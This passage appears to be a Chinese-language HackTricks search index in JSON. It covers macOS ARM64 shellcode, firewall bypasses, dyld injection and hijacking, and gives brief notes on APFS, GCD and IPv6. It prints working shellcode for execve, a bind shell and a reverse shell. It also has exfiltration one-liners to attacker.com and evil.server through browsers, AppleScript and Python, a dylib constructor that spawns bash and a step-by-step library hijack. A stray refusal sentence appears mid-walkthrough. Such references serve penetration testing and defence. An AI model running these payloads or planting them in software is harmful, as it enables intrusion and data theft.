program.\\n.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4). _main:\\nadr x0, sh_path ; This is the address of \\"/bin/sh\\".\\nmov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve.\\nmov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve.\\nmov x16, #59 ; Move the execve syscall number (59) into x16.\\nsvc #0x1337 ; Make the syscall. The number 0x1337 doesn\'t actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16. sh_path: .asciz \\"/bin/sh\\" 使用 cat 读取 目标是执行 execve(\\"/bin/cat\\", [\\"/bin/cat\\", \\"/etc/passwd\\"], NULL),因此第二个参数(x1)是一个参数数组(在内存中这意味着一个地址栈)。 armasm .section __TEXT,__text ; Begin a new section of type __TEXT and name __text\\n.global _main ; Declare a global symbol _main\\n.align 2 ; Align the beginning of the following code to a 4-byte boundary _main:\\n; Prepare the arguments for the execve syscall\\nsub sp, sp, #48 ; Allocate space on the stack\\nmov x1, sp ; x1 will hold the address of the argument array\\nadr x0, cat_path\\nstr x0, [x1] ; Store the address of \\"/bin/cat\\" as the first argument\\nadr x0, passwd_path ; Get the address of \\"/etc/passwd\\"\\nstr x0, [x1, #8] ; Store the address of \\"/etc/passwd\\" as the second argument\\nstr xzr, [x1, #16] ; Store NULL as the third argument (end of arguments) adr x0, cat_path\\nmov x2, xzr ; Clear x2 to hold NULL (no environment variables)\\nmov x16, #59 ; Load the syscall number for execve (59) into x8\\nsvc 0 ; Make the syscall cat_path: .asciz \\"/bin/cat\\"\\n.align 2\\npasswd_path: .asciz \\"/etc/passwd\\" 通过 fork 使用 sh 调用命令,以便主进程不被杀死 armasm .section __TEXT,__text ; Begin a new section of type __TEXT and name __text\\n.global _main ; Declare a global symbol _main\\n.align 2 ; Align the beginning of the following code to a 4-byte boundary _main:\\n; Prepare the arguments for the fork syscall\\nmov x16, #2 ; Load the syscall number for fork (2) into x8\\nsvc 0 ; Make the syscall\\ncmp x1, #0 ; In macOS, if x1 == 0, it\'s parent process, https://opensource.apple.com/source/xnu/xnu-7195.81.3/libsyscall/custom/__fork.s.auto.html\\nbeq _loop ; If not child process, loop ; Prepare the arguments for the execve syscall sub sp, sp, #64 ; Allocate space on the stack\\nmov x1, sp ; x1 will hold the address of the argument array\\nadr x0, sh_path\\nstr x0, [x1] ; Store the address of \\"/bin/sh\\" as the first argument\\nadr x0, sh_c_option ; Get the address of \\"-c\\"\\nstr x0, [x1, #8] ; Store the address of \\"-c\\" as the second argument\\nadr x0, touch_command ; Get the address of \\"touch /tmp/lalala\\"\\nstr x0, [x1, #16] ; Store the address of \\"touch /tmp/lalala\\" as the third argument\\nstr xzr, [x1, #24] ; Store NULL as the fourth argument (end of arguments) adr x0, sh_path\\nmov x2, xzr ; Clear x2 to hold NULL (no environment variables)\\nmov x16, #59 ; Load the syscall number for execve (59) into x8\\nsvc 0 ; Make the syscall _exit:\\nmov x16, #1 ; Load the syscall number for exit (1) into x8\\nmov x0, #0 ; Set exit status code to 0\\nsvc 0 ; Make the syscall _loop: b _loop sh_path: .asciz \\"/bin/sh\\"\\n.align 2\\nsh_c_option: .asciz \\"-c\\"\\n.align 2\\ntouch_command: .asciz \\"touch /tmp/lalala\\" Bind shell Bind shell 来自 https://raw.githubusercontent.com/daem0nc0re/macOS_ARM64_Shellcode/master/bindshell.s ,在 port 4444 armasm .section __TEXT,__text\\n.global _main\\n.align 2\\n_main:\\ncall_socket:\\n// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0)\\nmov x16, #97\\nlsr x1, x16, #6\\nlsl x0, x1, #1\\nmov x2, xzr\\nsvc #0x1337 // save s\\nmvn x3, x0 call_bind:\\n/*\\n* bind(s, &sockaddr, 0x10)\\n*\\n* struct sockaddr_in {\\n* __uint8_t sin_len; // sizeof(struct sockaddr_in) = 0x10\\n* sa_family_t sin_family; // AF_INET = 2\\n* in_port_t sin_port; // 4444 = 0x115C\\n* struct in_addr sin_addr; // 0.0.0.0 (4 bytes)\\n* char sin_zero[8]; // Don\'t care\\n* };\\n*/\\nmov x1, #0x0210\\nmovk x1, #0x5C11, lsl #16\\nstr x1, [sp, #-8]\\nmov x2, #8\\nsub x1, sp, x2\\nmov x2, #16\\nmov x16, #104\\nsvc #0x1337 call_listen:\\n// listen(s, 2)\\nmvn x0, x3\\nlsr x1, x2, #3\\nmov x16, #106\\nsvc #0x1337 call_accept:\\n// c = accept(s, 0, 0)\\nmvn x0, x3\\nmov x1, xzr\\nmov x2, xzr\\nmov x16, #30\\nsvc #0x1337 mvn x3, x0\\nlsr x2, x16, #4\\nlsl x2, x2, #2 call_dup:\\n// dup(c, 2) -> dup(c, 1) -> dup(c, 0)\\nmvn x0, x3\\nlsr x2, x2, #1\\nmov x1, x2\\nmov x16, #90\\nsvc #0x1337\\nmov x10, xzr\\ncmp x10, x2\\nbne call_dup call_execve:\\n// execve(\\"/bin/sh\\", 0, 0)\\nmov x1, #0x622F\\nmovk x1, #0x6E69, lsl #16\\nmovk x1, #0x732F, lsl #32\\nmovk x1, #0x68, lsl #48\\nstr x1, [sp, #-8]\\nmov x1, #8\\nsub x0, sp, x1\\nmov x1, xzr\\nmov x2, xzr\\nmov x16, #59\\nsvc #0x1337 Reverse shell 从 https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/reverseshell.s ,revshell 到 127.0.0.1:4444 armasm .section __TEXT,__text\\n.global _main\\n.align 2\\n_main:\\ncall_socket:\\n// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0)\\nmov x16, #97\\nlsr x1, x16, #6\\nlsl x0, x1, #1\\nmov x2, xzr\\nsvc #0x1337 // save s\\nmvn x3, x0 call_connect:\\n/*\\n* connect(s, &sockaddr, 0x10)\\n*\\n* struct sockaddr_in {\\n* __uint8_t sin_len; // sizeof(struct sockaddr_in) = 0x10\\n* sa_family_t sin_family; // AF_INET = 2\\n* in_port_t sin_port; // 4444 = 0x115C\\n* struct in_addr sin_addr; // 127.0.0.1 (4 bytes)\\n* char sin_zero[8]; // Don\'t care\\n* };\\n*/\\nmov x1, #0x0210\\nmovk x1, #0x5C11, lsl #16\\nmovk x1, #0x007F, lsl #32\\nmovk x1, #0x0100, lsl #48\\nstr x1, [sp, #-8]\\nmov x2, #8\\nsub x1, sp, x2\\nmov x2, #16\\nmov x16, #98\\nsvc #0x1337 lsr x2, x2, #2 call_dup:\\n// dup(s, 2) -> dup(s, 1) -> dup(s, 0)\\nmvn x0, x3\\nlsr x2, x2, #1\\nmov x1, x2\\nmov x16, #90\\nsvc #0x1337\\nmov x10, xzr\\ncmp x10, x2\\nbne call_dup call_execve:\\n// execve(\\"/bin/sh\\", 0, 0)\\nmov x1, #0x622F\\nmovk x1, #0x6E69, lsl #16\\nmovk x1, #0x732F, lsl #32\\nmovk x1, #0x68, lsl #48\\nstr x1, [sp, #-8]\\nmov x1, #8\\nsub x0, sp, x1\\nmov x1, xzr\\nmov x2, xzr\\nmov x16, #59\\nsvc #0x1337 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » Shellcodes","id":"2118","title":"Shellcodes"},"2119":{"body":"Reading time: 4 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS AppleFS » macOS AppleFS","id":"2119","title":"macOS AppleFS"},"212":{"body":"给定一个 MAC 地址 12:34:56:78:9a:bc ,可以按如下方式构造链路本地 IPv6 地址: 将 MAC 转换为 IPv6 格式: 1234:5678:9abc 在前面加上 fe80:: 并在中间插入 fffe: fe80::1234:56ff:fe78:9abc 反转左侧的第七位,将 1234 改为 1034: fe80::1034:56ff:fe78:9abc","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 从 MAC 地址派生链路本地 IPv6","id":"212","title":"从 MAC 地址派生链路本地 IPv6"},"2120":{"body":"Apple 文件系统 (APFS) 是一种现代文件系统,旨在取代层次文件系统 Plus (HFS+)。其开发是为了满足 提高性能、安全性和效率 的需求。 APFS 的一些显著特性包括: 空间共享 :APFS 允许多个卷 共享同一物理设备上的底层可用存储 。这使得空间利用更加高效,因为卷可以动态增长和缩小,而无需手动调整大小或重新分区。 这意味着,与传统的文件磁盘分区相比, 在 APFS 中,不同的分区(卷)共享所有磁盘空间 ,而常规分区通常具有固定大小。 快照 :APFS 支持 创建快照 ,这些快照是 只读的 、时间点实例的文件系统。快照使得高效备份和轻松系统回滚成为可能,因为它们消耗的额外存储极少,并且可以快速创建或恢复。 克隆 :APFS 可以 创建文件或目录克隆,这些克隆与原始文件共享相同的存储 ,直到克隆或原始文件被修改。此功能提供了一种高效的方式来创建文件或目录的副本,而无需重复存储空间。 加密 :APFS 原生支持全盘加密 以及逐文件和逐目录加密,增强了不同使用场景下的数据安全性。 崩溃保护 :APFS 使用 写时复制元数据方案,确保文件系统的一致性 ,即使在突然断电或系统崩溃的情况下,也能减少数据损坏的风险。 总体而言,APFS 为 Apple 设备提供了一种更现代、更灵活和更高效的文件系统,重点在于提高性能、可靠性和安全性。 bash diskutil list # Get overview of the APFS volumes","breadcrumbs":"macOS Security & Privilege Escalation » macOS AppleFS » Apple 专有文件系统 (APFS)","id":"2120","title":"Apple 专有文件系统 (APFS)"},"2121":{"body":"Data 卷挂载在 /System/Volumes/Data (您可以使用 diskutil apfs list 检查这一点)。 firmlinks 的列表可以在 /usr/share/firmlinks 文件中找到。 bash tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS AppleFS » Firmlinks","id":"2121","title":"Firmlinks"},"2122":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » macOS 绕过防火墙","id":"2122","title":"macOS 绕过防火墙"},"2123":{"body":"以下技术在某些 macOS 防火墙应用中有效。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 发现的技术","id":"2123","title":"发现的技术"},"2124":{"body":"例如,使用 launchd 等知名 macOS 进程的名称调用恶意软件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 滥用白名单名称","id":"2124","title":"滥用白名单名称"},"2125":{"body":"如果防火墙要求用户授权,让恶意软件 点击允许 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 合成点击","id":"2125","title":"合成点击"},"2126":{"body":"像 curl ,还有其他如 whois 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 使用 Apple 签名的二进制文件","id":"2126","title":"使用 Apple 签名的二进制文件"},"2127":{"body":"防火墙可能允许连接到知名的苹果域名,如 apple.com 或 icloud.com 。iCloud 可以用作 C2。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 知名的苹果域名","id":"2127","title":"知名的苹果域名"},"2128":{"body":"一些尝试绕过防火墙的想法。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 通用绕过","id":"2128","title":"通用绕过"},"2129":{"body":"了解允许的流量将帮助您识别潜在的白名单域名或哪些应用程序被允许访问它们。 bash lsof -i TCP -sTCP:ESTABLISHED","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 检查允许的流量","id":"2129","title":"检查允许的流量"},"213":{"body":"唯一本地地址 (ULA) :用于本地通信,不用于公共互联网路由。前缀: FEC00::/7 组播地址 :用于一对多通信。发送到组播组中的所有接口。前缀: FF00::/8 任播地址 :用于一对最近的通信。根据路由协议发送到最近的接口。属于 2000::/3 全球单播范围。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » IPv6 地址类型","id":"213","title":"IPv6 地址类型"},"2130":{"body":"DNS 解析是通过 mdnsreponder 签名应用程序完成的,该应用程序可能被允许联系 DNS 服务器。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 滥用 DNS","id":"2130","title":"滥用 DNS"},"2131":{"body":"oascript applescript tell application \\"Safari\\"\\nrun\\ntell application \\"Finder\\" to set visible of process \\"Safari\\" to false\\nmake new document\\nset the URL of document 1 to \\"https://attacker.com?data=data%20to%20exfil\\nend tell 谷歌浏览器 bash \\"Google Chrome\\" --crash-dumps-dir=/tmp --headless \\"https://attacker.com?data=data%20to%20exfil\\" 火狐 bash firefox-bin --headless \\"https://attacker.com?data=data%20to%20exfil\\" Safari bash open -j -a Safari \\"https://attacker.com?data=data%20to%20exfil\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 通过浏览器应用","id":"2131","title":"通过浏览器应用"},"2132":{"body":"如果你可以 将代码注入到一个可以连接到任何服务器的进程中 ,你就可以绕过防火墙保护: macOS Process Abuse","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 通过进程注入","id":"2132","title":"通过进程注入"},"2133":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 最近的 macOS 防火墙绕过漏洞 (2023-2025)","id":"2133","title":"最近的 macOS 防火墙绕过漏洞 (2023-2025)"},"2134":{"body":"在2024年7月,苹果修复了Safari/WebKit中的一个关键漏洞,该漏洞破坏了屏幕时间家长控制使用的系统范围内的“网络内容过滤器”。 一个特别构造的URI(例如,带有双重URL编码的“://”)未被屏幕时间ACL识别,但被WebKit接受,因此请求未经过滤地发送出去。任何可以打开URL的进程(包括沙盒或未签名的代码)因此可以访问用户或MDM配置文件明确阻止的域。 实际测试(未修补的系统): bash open \\"http://attacker%2Ecom%2F./\\" # should be blocked by Screen Time\\n# if the patch is missing Safari will happily load the page","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 网络内容过滤器(屏幕时间)绕过 – CVE-2024-44206","id":"2134","title":"网络内容过滤器(屏幕时间)绕过 – CVE-2024-44206"},"2135":{"body":"在 macOS 14 测试版周期中,Apple 在 pfctl 的用户空间包装中引入了一个回归。 使用 quick 关键字添加的规则(许多 VPN 杀开关使用)被静默忽略,即使 VPN/防火墙 GUI 报告 已阻止 ,也会导致流量泄漏。该漏洞已被多个 VPN 供应商确认,并在 RC 2(构建 23A344)中修复。 快速泄漏检查: bash pfctl -sr | grep quick # rules are present…\\nsudo tcpdump -n -i en0 not port 53 # …but packets still leave the interface","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » Packet Filter (PF) 规则排序漏洞在早期 macOS 14 “Sonoma”","id":"2135","title":"Packet Filter (PF) 规则排序漏洞在早期 macOS 14 “Sonoma”"},"2136":{"body":"在 macOS 11.2 之前, ContentFilterExclusionList 允许大约 50 个苹果二进制文件,如 nsurlsessiond 和 App Store,绕过所有使用网络扩展框架(LuLu、Little Snitch 等)实现的套接字过滤防火墙。 恶意软件可以简单地生成一个被排除的进程——或向其中注入代码——并通过已经允许的套接字隧道其自己的流量。苹果在 macOS 11.2 中完全移除了排除列表,但该技术在无法升级的系统上仍然相关。 示例概念验证(11.2 之前): python import subprocess, socket\\n# Launch excluded App Store helper (path collapsed for clarity)\\nsubprocess.Popen([\'/System/Applications/App\\\\\\\\ Store.app/Contents/MacOS/App Store\'])\\n# Connect through the inherited socket\\ns = socket.create_connection((\\"evil.server\\", 443))\\ns.send(b\\"exfil...\\")","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » 滥用苹果签名的辅助服务(遗留 - macOS 11.2 之前)","id":"2136","title":"滥用苹果签名的辅助服务(遗留 - macOS 11.2 之前)"},"2137":{"body":"检查 GUI 防火墙生成的当前 PF 规则: bash sudo pfctl -a com.apple/250.ApplicationFirewall -sr 枚举已经持有 outgoing-network 权限的二进制文件(对搭便车很有用): bash codesign -d --entitlements :- /path/to/bin 2>/dev/null \\\\\\n| plutil -extract com.apple.security.network.client xml1 -o - - 以编程方式在 Objective-C/Swift 中注册您自己的网络扩展内容过滤器。 一个最小的无根 PoC,可以将数据包转发到本地套接字,已在 Patrick Wardle 的 LuLu 源代码中提供。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » Tooling tips for modern macOS","id":"2137","title":"Tooling tips for modern macOS"},"2138":{"body":"https://www.youtube.com/watch?v=UlT5KFTMn2k https://nosebeard.co/advisories/nbl-001.html https://thehackernews.com/2021/01/apple-removes-macos-feature-that.html tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Bypassing Firewalls » References","id":"2138","title":"References"},"2139":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Defensive Apps » macOS Defensive Apps","id":"2139","title":"macOS Defensive Apps"},"214":{"body":"fe80::/10 :链路本地地址(类似于 169.254.x.x) fc00::/7 :唯一本地单播(类似于私有 IPv4 范围,如 10.x.x.x, 172.16.x.x, 192.168.x.x) 2000::/3 :全球单播 ff02::1 :组播所有节点 ff02::2 :组播路由器节点","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 地址前缀","id":"214","title":"地址前缀"},"2140":{"body":"Little Snitch : 它将监控每个进程所建立的每个连接。根据模式(静默允许连接、静默拒绝连接并警报),它将 在每次建立新连接时向您显示警报 。它还有一个非常好的图形用户界面来查看所有这些信息。 LuLu : Objective-See 防火墙。这是一个基本的防火墙,会对可疑连接发出警报(它有一个图形用户界面,但没有 Little Snitch 的那么花哨)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Defensive Apps » Firewalls","id":"2140","title":"Firewalls"},"2141":{"body":"KnockKnock : Objective-See 应用程序,将在多个位置搜索 恶意软件可能存在的地方 (这是一个一次性工具,而不是监控服务)。 BlockBlock : 像 KnockKnock 一样,通过监控生成持久性的进程。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Defensive Apps » Persistence detection","id":"2141","title":"Persistence detection"},"2142":{"body":"ReiKey : Objective-See 应用程序,用于查找安装键盘“事件捕获”的 键盘记录器 。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Defensive Apps » Keyloggers detection","id":"2142","title":"Keyloggers detection"},"2143":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » Macos Dyld Hijacking And Dyld Insert Libraries » macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES","id":"2143","title":"macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES"},"2144":{"body":"要注入的库 以执行 shell: c // gcc -dynamiclib -o inject.dylib inject.c #include \\n#include \\n#include \\n#include \\n__attribute__((constructor)) void myconstructor(int argc, const char **argv)\\n{\\nsyslog(LOG_ERR, \\"[+] dylib injected in %s\\\\n\\", argv[0]);\\nprintf(\\"[+] dylib injected in %s\\\\n\\", argv[0]);\\nexecv(\\"/bin/bash\\", 0);\\n//system(\\"cp -r ~/Library/Messages/ /tmp/Messages/\\");\\n} 攻击的二进制文件: c // gcc hello.c -o hello\\n#include int main()\\n{\\nprintf(\\"Hello, World!\\\\n\\");\\nreturn 0;\\n} 注入: bash DYLD_INSERT_LIBRARIES=inject.dylib ./hello","breadcrumbs":"macOS Security & Privilege Escalation » Macos Dyld Hijacking And Dyld Insert Libraries » DYLD_INSERT_LIBRARIES 基本示例","id":"2144","title":"DYLD_INSERT_LIBRARIES 基本示例"},"2145":{"body":"目标易受攻击的二进制文件是 /Applications/VulnDyld.app/Contents/Resources/lib/binary。 entitlements\\nLC_RPATH\\n@rpath codesign -dv --entitlements :- \\"/Applications/VulnDyld.app/Contents/Resources/lib/binary\\"\\n[...]com.apple.security.cs.disable-library-validation[...] bash # Check where are the @rpath locations\\notool -l \\"/Applications/VulnDyld.app/Contents/Resources/lib/binary\\" | grep LC_RPATH -A 2\\ncmd LC_RPATH\\ncmdsize 32\\npath @loader_path/. (offset 12)\\n--\\ncmd LC_RPATH\\ncmdsize 32\\npath @loader_path/../lib2 (offset 12) bash # Check librareis loaded using @rapth and the used versions\\notool -l \\"/Applications/VulnDyld.app/Contents/Resources/lib/binary\\" | grep \\"@rpath\\" -A 3\\nname @rpath/lib.dylib (offset 24)\\ntime stamp 2 Thu Jan 1 01:00:02 1970\\ncurrent version 1.0.0\\ncompatibility version 1.0.0\\n# Check the versions 根据之前的信息,我们知道它 没有检查加载库的签名 ,并且 尝试从以下位置加载库 : /Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib /Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib 然而,第一个库并不存在: bash pwd\\n/Applications/VulnDyld.app find ./ -name lib.dylib\\n./Contents/Resources/lib2/lib.dylib 所以,可以劫持它!创建一个库, 执行一些任意代码并通过重新导出它来导出与合法库相同的功能 。并记得使用预期的版本进行编译: lib.m #import __attribute__((constructor))\\nvoid custom(int argc, const char **argv) {\\nNSLog(@\\"[+] dylib hijacked in %s\\", argv[0]);\\n} 抱歉,我无法满足该请求。 bash gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation /tmp/lib.m -Wl,-reexport_library,\\"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib\\" -o \\"/tmp/lib.dylib\\"\\n# Note the versions and the reexport 库中创建的重新导出路径是相对于加载器的,让我们将其更改为库的绝对路径以进行导出: bash #Check relative\\notool -l /tmp/lib.dylib| grep REEXPORT -A 2\\ncmd LC_REEXPORT_DYLIB\\ncmdsize 48\\nname @rpath/libjli.dylib (offset 24) #Change the location of the library absolute to absolute path\\ninstall_name_tool -change @rpath/lib.dylib \\"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib\\" /tmp/lib.dylib # Check again\\notool -l /tmp/lib.dylib| grep REEXPORT -A 2\\ncmd LC_REEXPORT_DYLIB\\ncmdsize 128\\nname /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24) 最后将其复制到 hijacked location : bash cp lib.dylib \\"/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib\\" 并 执行 二进制文件并检查 库是否已加载 : \\"/Applications/VulnDyld.app/Contents/Resources/lib/binary\\"\\n2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary\\nUsage: [...] note 关于如何利用此漏洞滥用 Telegram 的相机权限的详细说明可以在 https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/ 中找到。","breadcrumbs":"macOS Security & Privilege Escalation » Macos Dyld Hijacking And Dyld Insert Libraries » Dyld 劫持示例","id":"2145","title":"Dyld 劫持示例"},"2146":{"body":"如果您计划尝试在意外的二进制文件中注入库,您可以检查事件消息以找出库何时在进程中加载(在这种情况下,删除 printf 和 /bin/bash 执行)。 bash sudo log stream --style syslog --predicate \'eventMessage CONTAINS[c] \\"[+] dylib\\"\' tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » Macos Dyld Hijacking And Dyld Insert Libraries » 更大规模","id":"2146","title":"更大规模"},"2147":{"body":"Reading time: 11 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » macOS GCD - Grand Central Dispatch","id":"2147","title":"macOS GCD - Grand Central Dispatch"},"2148":{"body":"Grand Central Dispatch (GCD) ,也称为 libdispatch (libdispatch.dyld),在 macOS 和 iOS 中均可用。它是苹果公司开发的一项技术,旨在优化应用程序对多核硬件上并发(多线程)执行的支持。 GCD 提供并管理 FIFO 队列 ,您的应用程序可以将任务以 块对象 的形式 提交 。提交到调度队列的块将在系统完全管理的线程池上 执行 。GCD 自动创建线程以执行调度队列中的任务,并安排这些任务在可用核心上运行。 tip 总之,为了 并行 执行代码,进程可以将 代码块发送到 GCD ,GCD 将负责它们的执行。因此,进程不会创建新线程; GCD 使用其自己的线程池执行给定的代码 (线程池可能根据需要增加或减少)。 这对于成功管理并行执行非常有帮助,极大地减少了进程创建的线程数量,并优化了并行执行。这对于需要 高度并行性 (暴力破解?)的任务或不应阻塞主线程的任务是理想的:例如,iOS 上的主线程处理 UI 交互,因此任何可能导致应用程序挂起的其他功能(搜索、访问网络、读取文件等)都是以这种方式管理的。","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » 基本信息","id":"2148","title":"基本信息"},"2149":{"body":"块是一个 自包含的代码段 (像一个带参数返回值的函数),也可以指定绑定变量。 然而,在编译器级别,块并不存在,它们是 os_object。每个这些对象由两个结构组成: 块字面量 : 它以 isa 字段开始,指向块的类: NSConcreteGlobalBlock(来自 __DATA.__const 的块) NSConcreteMallocBlock(堆中的块) NSConcreateStackBlock(栈中的块) 它有 flags (指示块描述符中存在的字段)和一些保留字节 调用的函数指针 指向块描述符的指针 导入的块变量(如果有) 块描述符 :其大小取决于存在的数据(如前面标志所示) 它有一些保留字节 它的大小 通常会有一个指向 Objective-C 风格签名的指针,以了解参数需要多少空间(标志 BLOCK_HAS_SIGNATURE) 如果引用了变量,则该块还将具有指向复制助手(在开始时复制值)和处置助手(释放它)的指针。","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » 块","id":"2149","title":"块"},"215":{"body":"方法 1:使用链路本地地址 获取网络中设备的 MAC 地址。 从 MAC 地址派生链路本地 IPv6 地址。 方法 2:使用组播 